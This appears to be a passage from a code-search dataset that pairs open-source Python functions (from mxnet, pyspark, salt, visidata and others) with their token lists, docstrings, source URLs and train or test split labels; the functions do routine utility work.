    d = {'componentId': self.component_id,
         'instanceName': self.instance_name}
    props = []
    for name in self.properties:
        p = {'name': name}
        if self.properties[name]:
            p['value'] = str(self.properties[name])
        props.append(p)
    if props:
        d[RTS_EXT_NS_YAML + 'properties'] = props
    return d
[ "def", "to_dict", "(", "self", ")", ":", "d", "=", "{", "'componentId'", ":", "self", ".", "component_id", ",", "'instanceName'", ":", "self", ".", "instance_name", "}", "props", "=", "[", "]", "for", "name", "in", "self", ".", "properties", ":", "p", "=", "{", "'name'", ":", "name", "}", "if", "self", ".", "properties", "[", "name", "]", ":", "p", "[", "'value'", "]", "=", "str", "(", "self", ".", "properties", "[", "name", "]", ")", "props", ".", "append", "(", "p", ")", "if", "props", ":", "d", "[", "RTS_EXT_NS_YAML", "+", "'properties'", "]", "=", "props", "return", "d" ]
Save this target component into a dictionary.
[ "Save", "this", "target", "component", "into", "a", "dictionary", "." ]
python
train
apache/incubator-mxnet
python/mxnet/contrib/onnx/onnx2mx/_op_translations.py
https://github.com/apache/incubator-mxnet/blob/1af29e9c060a4c7d60eeaacba32afdb9a7775ba7/python/mxnet/contrib/onnx/onnx2mx/_op_translations.py#L390-L395
def global_maxpooling(attrs, inputs, proto_obj):
    """Performs max pooling on the input."""
    new_attrs = translation_utils._add_extra_attributes(attrs,
                                                        {'global_pool': True,
                                                         'kernel': (1, 1),
                                                         'pool_type': 'max'})
    return 'Pooling', new_attrs, inputs
[ "def", "global_maxpooling", "(", "attrs", ",", "inputs", ",", "proto_obj", ")", ":", "new_attrs", "=", "translation_utils", ".", "_add_extra_attributes", "(", "attrs", ",", "{", "'global_pool'", ":", "True", ",", "'kernel'", ":", "(", "1", ",", "1", ")", ",", "'pool_type'", ":", "'max'", "}", ")", "return", "'Pooling'", ",", "new_attrs", ",", "inputs" ]
Performs max pooling on the input.
[ "Performs", "max", "pooling", "on", "the", "input", "." ]
python
train
apache/spark
python/pyspark/mllib/linalg/__init__.py
https://github.com/apache/spark/blob/618d6bff71073c8c93501ab7392c3cc579730f0b/python/pyspark/mllib/linalg/__init__.py#L1082-L1095
def toArray(self):
    """
    Return a numpy.ndarray

    >>> m = DenseMatrix(2, 2, range(4))
    >>> m.toArray()
    array([[ 0.,  2.],
           [ 1.,  3.]])
    """
    if self.isTransposed:
        return np.asfortranarray(
            self.values.reshape((self.numRows, self.numCols)))
    else:
        return self.values.reshape((self.numRows, self.numCols), order='F')
[ "def", "toArray", "(", "self", ")", ":", "if", "self", ".", "isTransposed", ":", "return", "np", ".", "asfortranarray", "(", "self", ".", "values", ".", "reshape", "(", "(", "self", ".", "numRows", ",", "self", ".", "numCols", ")", ")", ")", "else", ":", "return", "self", ".", "values", ".", "reshape", "(", "(", "self", ".", "numRows", ",", "self", ".", "numCols", ")", ",", "order", "=", "'F'", ")" ]
Return a numpy.ndarray

>>> m = DenseMatrix(2, 2, range(4))
>>> m.toArray()
array([[ 0.,  2.],
       [ 1.,  3.]])
[ "Return", "an", "numpy", ".", "ndarray" ]
python
train
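The order='F' branch above is what makes the doctest come out column-major; a quick numpy-only check:

import numpy as np

values = np.arange(4.0)  # [0., 1., 2., 3.], as in DenseMatrix(2, 2, range(4))
print(values.reshape((2, 2), order='F'))
# [[0. 2.]
#  [1. 3.]]  -- column-major layout, matching the doctest above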
pmacosta/peng
peng/wave_core.py
https://github.com/pmacosta/peng/blob/976935377adaa3de26fc5677aceb2cdfbd6f93a7/peng/wave_core.py#L87-L97
def _homogenize_waves(wave_a, wave_b):
    """
    Generate combined independent variable vector.

    The combination comes from two waveforms, together with the (possibly
    interpolated) dependent variable vectors of those two waveforms.
    """
    indep_vector = _get_indep_vector(wave_a, wave_b)
    dep_vector_a = _interp_dep_vector(wave_a, indep_vector)
    dep_vector_b = _interp_dep_vector(wave_b, indep_vector)
    return (indep_vector, dep_vector_a, dep_vector_b)
[ "def", "_homogenize_waves", "(", "wave_a", ",", "wave_b", ")", ":", "indep_vector", "=", "_get_indep_vector", "(", "wave_a", ",", "wave_b", ")", "dep_vector_a", "=", "_interp_dep_vector", "(", "wave_a", ",", "indep_vector", ")", "dep_vector_b", "=", "_interp_dep_vector", "(", "wave_b", ",", "indep_vector", ")", "return", "(", "indep_vector", ",", "dep_vector_a", ",", "dep_vector_b", ")" ]
Generate combined independent variable vector.

The combination comes from two waveforms, together with the (possibly
interpolated) dependent variable vectors of those two waveforms.
[ "Generate", "combined", "independent", "variable", "vector", "." ]
python
test
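A self-contained sketch of the homogenization idea using numpy. The peng helpers are private, so the combination rule here (union of the two grids, linear interpolation onto it) is an assumption for illustration, not necessarily peng's exact rule.

import numpy as np

xa, ya = np.array([0.0, 1.0, 2.0]), np.array([0.0, 10.0, 20.0])
xb, yb = np.array([0.5, 1.5]), np.array([5.0, 15.0])

indep_vector = np.union1d(xa, xb)               # assumed combination rule
dep_vector_a = np.interp(indep_vector, xa, ya)  # wave A on the common grid
dep_vector_b = np.interp(indep_vector, xb, yb)  # wave B on the common grid
print(indep_vector)  # -> [0.  0.5 1.  1.5 2. ]
print(dep_vector_a)  # -> [ 0.  5. 10. 15. 20.]
print(dep_vector_b)  # -> [ 5.  5. 10. 15. 15.] (flat extrapolation at the ends)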
KE-works/pykechain
pykechain/client.py
https://github.com/KE-works/pykechain/blob/b0296cf34328fd41660bf6f0b9114fd0167c40c4/pykechain/client.py#L290-L310
def reload(self, obj, extra_params=None):
    """Reload an object from server. This method is immutable and will return a new object.

    :param obj: object to reload
    :type obj: :py:obj:`obj`
    :param extra_params: additional object specific extra query string params (eg for activity)
    :type extra_params: dict
    :return: a new object
    :raises NotFoundError: if original object is not found or deleted in the meantime
    """
    if not obj._json_data.get('url'):  # pragma: no cover
        raise NotFoundError("Could not reload object, there is no url for object '{}' configured".format(obj))

    response = self._request('GET', obj._json_data.get('url'), params=extra_params)

    if response.status_code != requests.codes.ok:  # pragma: no cover
        raise NotFoundError("Could not reload object ({})".format(response))

    data = response.json()

    return obj.__class__(data['results'][0], client=self)
[ "def", "reload", "(", "self", ",", "obj", ",", "extra_params", "=", "None", ")", ":", "if", "not", "obj", ".", "_json_data", ".", "get", "(", "'url'", ")", ":", "# pragma: no cover", "raise", "NotFoundError", "(", "\"Could not reload object, there is no url for object '{}' configured\"", ".", "format", "(", "obj", ")", ")", "response", "=", "self", ".", "_request", "(", "'GET'", ",", "obj", ".", "_json_data", ".", "get", "(", "'url'", ")", ",", "params", "=", "extra_params", ")", "if", "response", ".", "status_code", "!=", "requests", ".", "codes", ".", "ok", ":", "# pragma: no cover", "raise", "NotFoundError", "(", "\"Could not reload object ({})\"", ".", "format", "(", "response", ")", ")", "data", "=", "response", ".", "json", "(", ")", "return", "obj", ".", "__class__", "(", "data", "[", "'results'", "]", "[", "0", "]", ",", "client", "=", "self", ")" ]
Reload an object from server. This method is immutable and will return a new object.

:param obj: object to reload
:type obj: :py:obj:`obj`
:param extra_params: additional object specific extra query string params (eg for activity)
:type extra_params: dict
:return: a new object
:raises NotFoundError: if original object is not found or deleted in the meantime
[ "Reload", "an", "object", "from", "server", ".", "This", "method", "is", "immutable", "and", "will", "return", "a", "new", "object", "." ]
python
train
O365/python-o365
O365/connection.py
https://github.com/O365/python-o365/blob/02a71cf3775cc6a3c042e003365d6a07c8c75a73/O365/connection.py#L697-L706
def patch(self, url, data=None, **kwargs):
    """ Shorthand for self.oauth_request(url, 'patch')

    :param str url: url to send patch oauth request to
    :param dict data: patch data to update the service
    :param kwargs: extra params to send to request api
    :return: Response of the request
    :rtype: requests.Response
    """
    return self.oauth_request(url, 'patch', data=data, **kwargs)
[ "def", "patch", "(", "self", ",", "url", ",", "data", "=", "None", ",", "*", "*", "kwargs", ")", ":", "return", "self", ".", "oauth_request", "(", "url", ",", "'patch'", ",", "data", "=", "data", ",", "*", "*", "kwargs", ")" ]
Shorthand for self.oauth_request(url, 'patch')

:param str url: url to send patch oauth request to
:param dict data: patch data to update the service
:param kwargs: extra params to send to request api
:return: Response of the request
:rtype: requests.Response
[ "Shorthand", "for", "self", ".", "oauth_request", "(", "url", "patch", ")" ]
python
train
hydpy-dev/hydpy
hydpy/auxs/xmltools.py
https://github.com/hydpy-dev/hydpy/blob/1bc6a82cf30786521d86b36e27900c6717d3348d/hydpy/auxs/xmltools.py#L1778-L1819
def get_mathitemsinsertion(cls, indent) -> str:
    """Return a string defining a model specific XML type extending `ItemType`.

    >>> from hydpy.auxs.xmltools import XSDWriter
    >>> print(XSDWriter.get_mathitemsinsertion(1))    # doctest: +ELLIPSIS
        <complexType name="arma_v1_mathitemType">
            <complexContent>
                <extension base="hpcb:setitemType">
                    <choice>
                        <element name="control.responses"/>
                        ...
                        <element name="logs.logout"/>
                    </choice>
                </extension>
            </complexContent>
        </complexType>
    <BLANKLINE>
        <complexType name="dam_v001_mathitemType">
    ...
    """
    blanks = ' ' * (indent*4)
    subs = []
    for modelname in cls.get_modelnames():
        model = importtools.prepare_model(modelname)
        subs.extend([
            f'{blanks}<complexType name="{modelname}_mathitemType">',
            f'{blanks}    <complexContent>',
            f'{blanks}        <extension base="hpcb:setitemType">',
            f'{blanks}            <choice>'])
        for subvars in cls._get_subvars(model):
            for var in subvars:
                subs.append(
                    f'{blanks}                '
                    f'<element name="{subvars.name}.{var.name}"/>')
        subs.extend([
            f'{blanks}            </choice>',
            f'{blanks}        </extension>',
            f'{blanks}    </complexContent>',
            f'{blanks}</complexType>',
            f''])
    return '\n'.join(subs)
[ "def", "get_mathitemsinsertion", "(", "cls", ",", "indent", ")", "->", "str", ":", "blanks", "=", "' '", "*", "(", "indent", "*", "4", ")", "subs", "=", "[", "]", "for", "modelname", "in", "cls", ".", "get_modelnames", "(", ")", ":", "model", "=", "importtools", ".", "prepare_model", "(", "modelname", ")", "subs", ".", "extend", "(", "[", "f'{blanks}<complexType name=\"{modelname}_mathitemType\">'", ",", "f'{blanks} <complexContent>'", ",", "f'{blanks} <extension base=\"hpcb:setitemType\">'", ",", "f'{blanks} <choice>'", "]", ")", "for", "subvars", "in", "cls", ".", "_get_subvars", "(", "model", ")", ":", "for", "var", "in", "subvars", ":", "subs", ".", "append", "(", "f'{blanks} '", "f'<element name=\"{subvars.name}.{var.name}\"/>'", ")", "subs", ".", "extend", "(", "[", "f'{blanks} </choice>'", ",", "f'{blanks} </extension>'", ",", "f'{blanks} </complexContent>'", ",", "f'{blanks}</complexType>'", ",", "f''", "]", ")", "return", "'\\n'", ".", "join", "(", "subs", ")" ]
Return a string defining a model specific XML type extending `ItemType`.

>>> from hydpy.auxs.xmltools import XSDWriter
>>> print(XSDWriter.get_mathitemsinsertion(1))    # doctest: +ELLIPSIS
    <complexType name="arma_v1_mathitemType">
        <complexContent>
            <extension base="hpcb:setitemType">
                <choice>
                    <element name="control.responses"/>
                    ...
                    <element name="logs.logout"/>
                </choice>
            </extension>
        </complexContent>
    </complexType>
<BLANKLINE>
    <complexType name="dam_v001_mathitemType">
...
[ "Return", "a", "string", "defining", "a", "model", "specific", "XML", "type", "extending", "ItemType", "." ]
python
train
saulpw/visidata
visidata/vdtui.py
https://github.com/saulpw/visidata/blob/32771e0cea6c24fc7902683d14558391395c591f/visidata/vdtui.py#L2229-L2234
def setValueSafe(self, row, value):
    'setValue and ignore exceptions'
    try:
        return self.setValue(row, value)
    except Exception as e:
        exceptionCaught(e)
[ "def", "setValueSafe", "(", "self", ",", "row", ",", "value", ")", ":", "try", ":", "return", "self", ".", "setValue", "(", "row", ",", "value", ")", "except", "Exception", "as", "e", ":", "exceptionCaught", "(", "e", ")" ]
setValue and ignore exceptions
[ "setValue", "and", "ignore", "exceptions" ]
python
train
saltstack/salt
salt/modules/redismod.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/redismod.py#L434-L447
def hvals(key, host=None, port=None, db=None, password=None):
    '''
    Return all the values in a hash.

    .. versionadded:: 2017.7.0

    CLI Example:

    .. code-block:: bash

        salt '*' redis.hvals foo_hash
    '''
    server = _connect(host, port, db, password)
    return server.hvals(key)
[ "def", "hvals", "(", "key", ",", "host", "=", "None", ",", "port", "=", "None", ",", "db", "=", "None", ",", "password", "=", "None", ")", ":", "server", "=", "_connect", "(", "host", ",", "port", ",", "db", ",", "password", ")", "return", "server", ".", "hvals", "(", "key", ")" ]
Return all the values in a hash.

.. versionadded:: 2017.7.0

CLI Example:

.. code-block:: bash

    salt '*' redis.hvals foo_hash
[ "Return", "all", "the", "values", "in", "a", "hash", "." ]
python
train
openstack/networking-cisco
networking_cisco/ml2_drivers/nexus/nexus_restapi_network_driver.py
https://github.com/openstack/networking-cisco/blob/aa58a30aec25b86f9aa5952b0863045975debfa9/networking_cisco/ml2_drivers/nexus/nexus_restapi_network_driver.py#L792-L804
def disable_vlan_on_trunk_int(self, nexus_host, vlanid, intf_type,
                              interface, is_native):
    """Disable a VLAN on a trunk interface."""

    starttime = time.time()
    path_snip, body_snip = self._get_vlan_body_on_trunk_int(
        nexus_host, vlanid, intf_type, interface,
        is_native, True, False)
    self.send_edit_string(nexus_host, path_snip, body_snip)
    self.capture_and_print_timeshot(
        starttime, "delif", switch=nexus_host)
[ "def", "disable_vlan_on_trunk_int", "(", "self", ",", "nexus_host", ",", "vlanid", ",", "intf_type", ",", "interface", ",", "is_native", ")", ":", "starttime", "=", "time", ".", "time", "(", ")", "path_snip", ",", "body_snip", "=", "self", ".", "_get_vlan_body_on_trunk_int", "(", "nexus_host", ",", "vlanid", ",", "intf_type", ",", "interface", ",", "is_native", ",", "True", ",", "False", ")", "self", ".", "send_edit_string", "(", "nexus_host", ",", "path_snip", ",", "body_snip", ")", "self", ".", "capture_and_print_timeshot", "(", "starttime", ",", "\"delif\"", ",", "switch", "=", "nexus_host", ")" ]
Disable a VLAN on a trunk interface.
[ "Disable", "a", "VLAN", "on", "a", "trunk", "interface", "." ]
python
train
JdeRobot/base
src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_map/mp_tile.py
https://github.com/JdeRobot/base/blob/303b18992785b2fe802212f2d758a60873007f1f/src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_map/mp_tile.py#L106-L117
def coord(self, offset=(0,0)):
    '''return lat,lon within a tile given (offsetx,offsety)'''
    (tilex, tiley) = self.tile
    (offsetx, offsety) = offset
    world_tiles = 1<<self.zoom
    x = ( tilex + 1.0*offsetx/TILES_WIDTH ) / (world_tiles/2.) - 1
    y = ( tiley + 1.0*offsety/TILES_HEIGHT) / (world_tiles/2.) - 1
    lon = x * 180.0
    y = math.exp(-y*2*math.pi)
    e = (y-1)/(y+1)
    lat = 180.0/math.pi * math.asin(e)
    return (lat, lon)
[ "def", "coord", "(", "self", ",", "offset", "=", "(", "0", ",", "0", ")", ")", ":", "(", "tilex", ",", "tiley", ")", "=", "self", ".", "tile", "(", "offsetx", ",", "offsety", ")", "=", "offset", "world_tiles", "=", "1", "<<", "self", ".", "zoom", "x", "=", "(", "tilex", "+", "1.0", "*", "offsetx", "/", "TILES_WIDTH", ")", "/", "(", "world_tiles", "/", "2.", ")", "-", "1", "y", "=", "(", "tiley", "+", "1.0", "*", "offsety", "/", "TILES_HEIGHT", ")", "/", "(", "world_tiles", "/", "2.", ")", "-", "1", "lon", "=", "x", "*", "180.0", "y", "=", "math", ".", "exp", "(", "-", "y", "*", "2", "*", "math", ".", "pi", ")", "e", "=", "(", "y", "-", "1", ")", "/", "(", "y", "+", "1", ")", "lat", "=", "180.0", "/", "math", ".", "pi", "*", "math", ".", "asin", "(", "e", ")", "return", "(", "lat", ",", "lon", ")" ]
return lat,lon within a tile given (offsetx,offsety)
[ "return", "lat", "lon", "within", "a", "tile", "given", "(", "offsetx", "offsety", ")" ]
python
train
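The last four lines of coord are the inverse Web Mercator (Gudermannian) projection. A self-contained check that the origin of tile (0, 0) at zoom 1 maps to roughly (85.05, -180):

import math

def tile_origin(tilex, tiley, zoom):
    # same arithmetic as coord above, with offset (0, 0)
    world_tiles = 1 << zoom
    x = tilex / (world_tiles / 2.0) - 1
    y = tiley / (world_tiles / 2.0) - 1
    lon = x * 180.0
    y = math.exp(-y * 2 * math.pi)
    lat = 180.0 / math.pi * math.asin((y - 1) / (y + 1))
    return (lat, lon)

print(tile_origin(0, 0, 1))  # approx (85.0511287798066, -180.0)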
crackinglandia/pype32
pype32/pype32.py
https://github.com/crackinglandia/pype32/blob/192fd14dfc0dd36d953739a81c17fbaf5e3d6076/pype32/pype32.py#L627-L650
def _adjustFileAlignment(self, value, fileAlignment):
    """
    Align a value to C{FileAlignment}.

    @type value: int
    @param value: The value to align.

    @type fileAlignment: int
    @param fileAlignment: The value to be used to align the C{value} parameter.

    @rtype: int
    @return: The aligned value.
    """
    if fileAlignment > consts.DEFAULT_FILE_ALIGNMENT:
        if not utils.powerOfTwo(fileAlignment):
            print("Warning: FileAlignment is greater than DEFAULT_FILE_ALIGNMENT (0x200) and is not a power of two.")

    if fileAlignment < consts.DEFAULT_FILE_ALIGNMENT:
        return value

    if fileAlignment and value % fileAlignment:
        return ((value // fileAlignment) + 1) * fileAlignment
    return value
[ "def", "_adjustFileAlignment", "(", "self", ",", "value", ",", "fileAlignment", ")", ":", "if", "fileAlignment", ">", "consts", ".", "DEFAULT_FILE_ALIGNMENT", ":", "if", "not", "utils", ".", "powerOfTwo", "(", "fileAlignment", ")", ":", "print", "\"Warning: FileAlignment is greater than DEFAULT_FILE_ALIGNMENT (0x200) and is not power of two.\"", "if", "fileAlignment", "<", "consts", ".", "DEFAULT_FILE_ALIGNMENT", ":", "return", "value", "if", "fileAlignment", "and", "value", "%", "fileAlignment", ":", "return", "(", "(", "value", "/", "fileAlignment", ")", "+", "1", ")", "*", "fileAlignment", "return", "value" ]
Align a value to C{FileAlignment}.

@type value: int
@param value: The value to align.

@type fileAlignment: int
@param fileAlignment: The value to be used to align the C{value} parameter.

@rtype: int
@return: The aligned value.
[ "Align", "a", "value", "to", "C", "{", "FileAligment", "}", "." ]
python
train
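A worked example of the rounding rule above: values round up to the next multiple of the alignment, but only when the alignment is at least the 0x200 default.

def align_up(value, alignment, default=0x200):
    # same arithmetic as _adjustFileAlignment above
    if alignment < default:
        return value
    if alignment and value % alignment:
        return ((value // alignment) + 1) * alignment
    return value

print(hex(align_up(0x123, 0x200)))  # 0x200: rounded up
print(hex(align_up(0x400, 0x200)))  # 0x400: already aligned
print(hex(align_up(0x123, 0x10)))   # 0x123: alignment below the default is ignored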
arlyon/hyperion
hyperion/models/bike.py
https://github.com/arlyon/hyperion/blob/d8de0388ba98b85ce472e0f49ac18fecb14d3343/hyperion/models/bike.py#L29-L37
def get_most_recent_bike() -> Optional['Bike']:
    """
    Gets the most recently cached bike from the database.
    :return: The bike that was cached most recently.
    """
    try:
        return Bike.select().order_by(Bike.cached_date.desc()).get()
    except pw.DoesNotExist:
        return None
[ "def", "get_most_recent_bike", "(", ")", "->", "Optional", "[", "'Bike'", "]", ":", "try", ":", "return", "Bike", ".", "select", "(", ")", ".", "order_by", "(", "Bike", ".", "cached_date", ".", "desc", "(", ")", ")", ".", "get", "(", ")", "except", "pw", ".", "DoesNotExist", ":", "return", "None" ]
Gets the most recently cached bike from the database.
:return: The bike that was cached most recently.
[ "Gets", "the", "most", "recently", "cached", "bike", "from", "the", "database", ".", ":", "return", ":", "The", "bike", "that", "was", "cached", "most", "recently", "." ]
python
test
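The query pattern above (order by the timestamp descending, take the newest row, translate DoesNotExist into None) in a runnable in-memory peewee sketch; the Bike model here is a minimal stand-in, not hyperion's real schema.

import datetime
import peewee as pw

db = pw.SqliteDatabase(':memory:')

class Bike(pw.Model):
    cached_date = pw.DateTimeField(default=datetime.datetime.now)

    class Meta:
        database = db

db.create_tables([Bike])
try:
    print(Bike.select().order_by(Bike.cached_date.desc()).get())
except pw.DoesNotExist:
    print(None)  # empty table behaves like get_most_recent_bike() -> None
Bike.create()
print(Bike.select().order_by(Bike.cached_date.desc()).get())  # newest row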
tsnaomi/finnsyll
finnsyll/prev/v10.py
https://github.com/tsnaomi/finnsyll/blob/6a42740311688c946a636a3e2304866c7aa041b3/finnsyll/prev/v10.py#L179-L195
def apply_T2(word):
    '''There is a syllable boundary within a VV sequence of two nonidentical
    vowels that are not a genuine diphthong, e.g., [ta.e], [ko.et.taa].'''
    WORD = word
    offset = 0

    for vv in vv_sequences(WORD):
        seq = vv.group(2)

        if not is_diphthong(seq) and not is_long(seq):
            i = vv.start(2) + 1 + offset
            WORD = WORD[:i] + '.' + WORD[i:]
            offset += 1

    RULE = ' T2' if word != WORD else ''

    return WORD, RULE
[ "def", "apply_T2", "(", "word", ")", ":", "WORD", "=", "word", "offset", "=", "0", "for", "vv", "in", "vv_sequences", "(", "WORD", ")", ":", "seq", "=", "vv", ".", "group", "(", "2", ")", "if", "not", "is_diphthong", "(", "seq", ")", "and", "not", "is_long", "(", "seq", ")", ":", "i", "=", "vv", ".", "start", "(", "2", ")", "+", "1", "+", "offset", "WORD", "=", "WORD", "[", ":", "i", "]", "+", "'.'", "+", "WORD", "[", "i", ":", "]", "offset", "+=", "1", "RULE", "=", "' T2'", "if", "word", "!=", "WORD", "else", "''", "return", "WORD", ",", "RULE" ]
There is a syllable boundary within a VV sequence of two nonidentical vowels that are not a genuine diphthong, e.g., [ta.e], [ko.et.taa].
[ "There", "is", "a", "syllable", "boundary", "within", "a", "VV", "sequence", "of", "two", "nonidentical", "vowels", "that", "are", "not", "a", "genuine", "diphthong", "e", ".", "g", ".", "[", "ta", ".", "e", "]", "[", "ko", ".", "et", ".", "taa", "]", "." ]
python
train
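A runnable sketch of the rule on the docstring's own examples. The three helpers are module-private in finnsyll, so the stand-ins below are simplified assumptions, not the real implementations, and apply_T2 is condensed inline so the snippet runs on its own.

import re

def vv_sequences(word):
    # overlapping VV pairs; group(2)/start(2) match what apply_T2 expects
    return re.finditer(r'(?=(([aeiouyäö]{2})))', word)

def is_long(seq):
    return seq[0] == seq[1]

def is_diphthong(seq):
    # partial, assumed set of genuine Finnish diphthongs
    return seq in {'ai', 'ei', 'oi', 'ui', 'au', 'eu', 'ou', 'ie', 'uo', 'yö'}

def apply_T2(word):  # condensed copy of the function above
    WORD, offset = word, 0
    for vv in vv_sequences(WORD):
        seq = vv.group(2)
        if not is_diphthong(seq) and not is_long(seq):
            i = vv.start(2) + 1 + offset
            WORD = WORD[:i] + '.' + WORD[i:]
            offset += 1
    return WORD, ' T2' if word != WORD else ''

print(apply_T2('tae'))      # ('ta.e', ' T2')
print(apply_T2('koettaa'))  # ('ko.ettaa', ' T2'); later rules handle 'ttaa'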
sdispater/orator
orator/orm/relations/belongs_to_many.py
https://github.com/sdispater/orator/blob/bd90bf198ee897751848f9a92e49d18e60a74136/orator/orm/relations/belongs_to_many.py#L310-L321
def _set_where(self):
    """
    Set the where clause for the relation query.

    :return: self
    :rtype: BelongsToMany
    """
    foreign = self.get_foreign_key()

    self._query.where(foreign, "=", self._parent.get_key())

    return self
[ "def", "_set_where", "(", "self", ")", ":", "foreign", "=", "self", ".", "get_foreign_key", "(", ")", "self", ".", "_query", ".", "where", "(", "foreign", ",", "\"=\"", ",", "self", ".", "_parent", ".", "get_key", "(", ")", ")", "return", "self" ]
Set the where clause for the relation query.

:return: self
:rtype: BelongsToMany
[ "Set", "the", "where", "clause", "for", "the", "relation", "query", "." ]
python
train
saltstack/salt
salt/utils/virtualbox.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/virtualbox.py#L371-L415
def vb_clone_vm(
    name=None,
    clone_from=None,
    clone_mode=0,
    timeout=10000,
    **kwargs
):
    '''
    Tells virtualbox to create a VM by cloning from an existing one

    @param name: Name for the new VM
    @type name: str
    @param clone_from: Name of the existing VM to clone from
    @type clone_from: str
    @param timeout: maximum time in milliseconds to wait or -1 to wait indefinitely
    @type timeout: int
    @return dict of resulting VM
    '''
    vbox = vb_get_box()
    log.info('Clone virtualbox machine %s from %s', name, clone_from)

    source_machine = vbox.findMachine(clone_from)

    groups = None
    os_type_id = 'Other'
    new_machine = vbox.createMachine(
        None,  # Settings file
        name,
        groups,
        os_type_id,
        None  # flags
    )

    progress = source_machine.cloneTo(
        new_machine,
        clone_mode,  # CloneMode
        None  # CloneOptions : None = Full?
    )

    progress.waitForCompletion(timeout)
    log.info('Finished cloning %s from %s', name, clone_from)

    vbox.registerMachine(new_machine)

    return vb_xpcom_to_attribute_dict(new_machine, 'IMachine')
[ "def", "vb_clone_vm", "(", "name", "=", "None", ",", "clone_from", "=", "None", ",", "clone_mode", "=", "0", ",", "timeout", "=", "10000", ",", "*", "*", "kwargs", ")", ":", "vbox", "=", "vb_get_box", "(", ")", "log", ".", "info", "(", "'Clone virtualbox machine %s from %s'", ",", "name", ",", "clone_from", ")", "source_machine", "=", "vbox", ".", "findMachine", "(", "clone_from", ")", "groups", "=", "None", "os_type_id", "=", "'Other'", "new_machine", "=", "vbox", ".", "createMachine", "(", "None", ",", "# Settings file", "name", ",", "groups", ",", "os_type_id", ",", "None", "# flags", ")", "progress", "=", "source_machine", ".", "cloneTo", "(", "new_machine", ",", "clone_mode", ",", "# CloneMode", "None", "# CloneOptions : None = Full?", ")", "progress", ".", "waitForCompletion", "(", "timeout", ")", "log", ".", "info", "(", "'Finished cloning %s from %s'", ",", "name", ",", "clone_from", ")", "vbox", ".", "registerMachine", "(", "new_machine", ")", "return", "vb_xpcom_to_attribute_dict", "(", "new_machine", ",", "'IMachine'", ")" ]
Tells virtualbox to create a VM by cloning from an existing one

@param name: Name for the new VM
@type name: str
@param clone_from: Name of the existing VM to clone from
@type clone_from: str
@param timeout: maximum time in milliseconds to wait or -1 to wait indefinitely
@type timeout: int
@return dict of resulting VM
[ "Tells", "virtualbox", "to", "create", "a", "VM", "by", "cloning", "from", "an", "existing", "one" ]
python
train
zhammer/faaspact-verifier
faaspact_verifier/entities/emulator.py
https://github.com/zhammer/faaspact-verifier/blob/f2b7accb869bcadbe4aecbce1ca8e89d47843b44/faaspact_verifier/entities/emulator.py#L94-L102
def _use_provider_states(
        provider_state_fixtures_with_params: List[Tuple[ProviderStateFixture, Dict]]
) -> Generator:
    """Run all given provider states as a contextmanager."""
    with contextlib.ExitStack() as stack:
        for provider_state_fixture, params in provider_state_fixtures_with_params:
            stack.enter_context(provider_state_fixture(**params))
        yield
[ "def", "_use_provider_states", "(", "provider_state_fixtures_with_params", ":", "List", "[", "Tuple", "[", "ProviderStateFixture", ",", "Dict", "]", "]", ")", "->", "Generator", ":", "with", "contextlib", ".", "ExitStack", "(", ")", "as", "stack", ":", "for", "provider_state_fixture", ",", "params", "in", "provider_state_fixtures_with_params", ":", "stack", ".", "enter_context", "(", "provider_state_fixture", "(", "*", "*", "params", ")", ")", "yield" ]
Run all given provider states as a contextmanager.
[ "Run", "all", "given", "provider", "states", "as", "a", "contextmanager", "." ]
python
train
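The ExitStack idiom above, shown self-contained: enter a variable number of context managers, then unwind them all (in LIFO order) when the block finishes.

import contextlib

@contextlib.contextmanager
def provider_state(name):
    print('set up:', name)
    try:
        yield
    finally:
        print('tear down:', name)

with contextlib.ExitStack() as stack:
    for name in ('user exists', 'cart is empty'):
        stack.enter_context(provider_state(name))
    print('verify the pact interactions here')
# tear-down runs afterwards, 'cart is empty' first (LIFO)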
rackerlabs/fastfood
fastfood/book.py
https://github.com/rackerlabs/fastfood/blob/543970c4cedbb3956e84a7986469fdd7e4ee8fc8/fastfood/book.py#L97-L107
def depends_statement(cookbook_name, metadata=None):
    """Return a valid Ruby 'depends' statement for the metadata.rb file."""
    line = "depends '%s'" % cookbook_name
    if metadata:
        if not isinstance(metadata, dict):
            raise TypeError("Stencil dependency options for %s "
                            "should be a dict of options, not %s."
                            % (cookbook_name, metadata))
        if metadata:
            line = "%s '%s'" % (line, "', '".join(metadata))
    return line
[ "def", "depends_statement", "(", "cookbook_name", ",", "metadata", "=", "None", ")", ":", "line", "=", "\"depends '%s'\"", "%", "cookbook_name", "if", "metadata", ":", "if", "not", "isinstance", "(", "metadata", ",", "dict", ")", ":", "raise", "TypeError", "(", "\"Stencil dependency options for %s \"", "\"should be a dict of options, not %s.\"", "%", "(", "cookbook_name", ",", "metadata", ")", ")", "if", "metadata", ":", "line", "=", "\"%s '%s'\"", "%", "(", "line", ",", "\"', '\"", ".", "join", "(", "metadata", ")", ")", "return", "line" ]
Return a valid Ruby 'depends' statement for the metadata.rb file.
[ "Return", "a", "valid", "Ruby", "depends", "statement", "for", "the", "metadata", ".", "rb", "file", "." ]
python
train
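What the function above produces; the copy below inlines the logic (with the redundant inner check collapsed) so the examples run without fastfood. Note that a dict of options contributes its keys, joined in dict order.

def depends_statement(cookbook_name, metadata=None):
    # condensed copy of the function above
    line = "depends '%s'" % cookbook_name
    if metadata:
        if not isinstance(metadata, dict):
            raise TypeError("Stencil dependency options for %s should be "
                            "a dict of options, not %s." % (cookbook_name, metadata))
        line = "%s '%s'" % (line, "', '".join(metadata))
    return line

print(depends_statement('apt'))                      # depends 'apt'
print(depends_statement('apt', {'~> 2.0.0': None}))  # depends 'apt' '~> 2.0.0'
print(depends_statement('mysql', {'>= 1.0.0': 1, '< 3.0.0': 1}))
# depends 'mysql' '>= 1.0.0', '< 3.0.0' -- keys joined with "', '"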
cga-harvard/Hypermap-Registry
hypermap/aggregator/tasks.py
https://github.com/cga-harvard/Hypermap-Registry/blob/899a5385b15af7fba190ab4fae1d41e47d155a1b/hypermap/aggregator/tasks.py#L209-L228
def index_service(self, service_id):
    """
    Index a service in search engine.
    """
    from hypermap.aggregator.models import Service

    service = Service.objects.get(id=service_id)

    if not service.is_valid:
        LOGGER.debug('Not indexing service with id %s in search engine as it is not valid' % service.id)
        return

    LOGGER.debug('Indexing service %s' % service.id)

    layer_to_process = service.layer_set.all()
    for layer in layer_to_process:
